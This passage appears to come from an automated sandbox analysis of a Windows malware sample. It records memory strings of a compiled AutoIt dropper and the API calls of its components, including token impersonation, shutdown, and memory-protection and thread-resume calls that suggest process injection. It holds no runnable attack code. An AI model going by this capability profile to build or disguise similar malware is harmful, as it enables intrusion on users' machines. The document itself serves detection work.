oPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ac056e16-d
                Source: palladiums.exe, 0000001A.00000002.2297711549.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_44b820d4-3
                Source: palladiums.exe, 0000001A.00000002.2297711549.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_28c4d74a-6
                Source: palladiums.exe, 0000001B.00000000.2297233561.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cf92e57b-4
                Source: palladiums.exe, 0000001B.00000000.2297233561.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4043846e-5
                Source: palladiums.exe, 0000001C.00000000.2306338823.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fb4fd0ad-2
                Source: palladiums.exe, 0000001C.00000000.2306338823.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_80935f0e-9
                Source: palladiums.exe, 0000001D.00000000.2314892650.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2c58d131-a
                Source: palladiums.exe, 0000001D.00000000.2314892650.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b8458120-e
                Source: palladiums.exe, 0000001E.00000000.2325824658.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f19f2c57-c
                Source: palladiums.exe, 0000001E.00000000.2325824658.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_43dad8c4-d
                Source: palladiums.exe, 00000023.00000002.2384224017.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2db6cc16-0
                Source: palladiums.exe, 00000023.00000002.2384224017.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f8bcb24e-8
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0696AEB0 NtResumeThread,4_2_0696AEB0
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06967548 NtProtectVirtualMemory,4_2_06967548
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0696AEA8 NtResumeThread,4_2_0696AEA8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06967540 NtProtectVirtualMemory,4_2_06967540
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0077D5EB
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00771201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00771201
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0077E8F6
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0009E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0009E8F6
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007180600_2_00718060
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007820460_2_00782046
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007782980_2_00778298
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0074E4FF0_2_0074E4FF
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0074676B0_2_0074676B
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007A48730_2_007A4873
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0071CAF00_2_0071CAF0
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0073CAA00_2_0073CAA0
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0072CC390_2_0072CC39
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00746DD90_2_00746DD9
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0072B1190_2_0072B119
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007191C00_2_007191C0
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007313940_2_00731394
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007317060_2_00731706
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0073781B0_2_0073781B
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0072997D0_2_0072997D
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007179200_2_00717920
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007319B00_2_007319B0
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00737A4A0_2_00737A4A
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00731C770_2_00731C77
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00737CA70_2_00737CA7
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0079BE440_2_0079BE44
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00749EEE0_2_00749EEE
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0071BF400_2_0071BF40
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00731F320_2_00731F32
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_01322E680_2_01322E68
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A20462_2_000A2046
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000380602_2_00038060
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000982982_2_00098298
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0006E4FF2_2_0006E4FF
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0006676B2_2_0006676B
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000C48732_2_000C4873
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0005CAA02_2_0005CAA0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0003CAF02_2_0003CAF0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0004CC392_2_0004CC39
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00066DD92_2_00066DD9
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0004B1192_2_0004B119
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000391C02_2_000391C0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000513942_2_00051394
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000517062_2_00051706
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0005781B2_2_0005781B
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000379202_2_00037920
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0004997D2_2_0004997D
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000519B02_2_000519B0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00057A4A2_2_00057A4A
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00051C772_2_00051C77
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00057CA72_2_00057CA7
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000BBE442_2_000BBE44
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00069EEE2_2_00069EEE
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00051F322_2_00051F32
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00F030B02_2_00F030B0
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_00BCB8434_2_00BCB843
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_00BC79004_2_00BC7900
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_00BC78F04_2_00BC78F0
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_00BC39904_2_00BC3990
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_00BC39804_2_00BC3980
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_00BC3E104_2_00BC3E10
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_00BC3F184_2_00BC3F18
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064DA4F84_2_064DA4F8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E43504_2_064E4350
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E0B404_2_064E0B40
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E0B3F4_2_064E0B3F
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E58684_2_064E5868
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E78804_2_064E7880
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E78904_2_064E7890
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E21484_2_064E2148
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E21584_2_064E2158
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066827004_2_06682700
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066802104_2_06680210
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066826F04_2_066826F0
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066802004_2_06680200
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0668BD624_2_0668BD62
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0668BD704_2_0668BD70
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A75A04_2_066A75A0
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A9C584_2_066A9C58
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066ADD404_2_066ADD40
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A09D74_2_066A09D7
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A759A4_2_066A759A
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066AF3384_2_066AF338
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066AE0674_2_066AE067
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A00404_2_066A0040
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A00224_2_066A0022
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A9C484_2_066A9C48
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066AAA014_2_066AAA01
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066F00404_2_066F0040
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066F00064_2_066F0006
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066FE5D84_2_066FE5D8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_067104484_2_06710448
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_067104394_2_06710439
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0671F4F84_2_0671F4F8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_067182704_2_06718270
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06711BF84_2_06711BF8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06711BE84_2_06711BE8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06717BB84_2_06717BB8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06717BAA4_2_06717BAA
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06963D704_2_06963D70
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06963D604_2_06963D60
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_069BFB204_2_069BFB20
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_069BEA504_2_069BEA50
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_069A00234_2_069A0023
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_069A00404_2_069A0040
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_069BE5504_2_069BE550
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 9_2_00F01D009_2_00F01D00
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 11_2_010DAEC011_2_010DAEC0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 12_2_00F3439012_2_00F34390
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 14_2_00EB8C7014_2_00EB8C70
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_014D1DD415_2_014D1DD4
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_014D489C15_2_014D489C
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_01533A5815_2_01533A58
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 16_2_0164277016_2_01642770
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 17_2_00F03B2817_2_00F03B28
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00F2489C18_2_00F2489C
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00F21DD418_2_00F21DD4
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00FA298018_2_00FA2980
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 19_2_0157430019_2_01574300
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 20_2_01434DD020_2_01434DD0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 21_2_01303A5821_2_01303A58
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 22_2_015FDED822_2_015FDED8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 23_2_01441DD423_2_01441DD4
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 23_2_0144489C23_2_0144489C
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 23_2_014B53B823_2_014B53B8
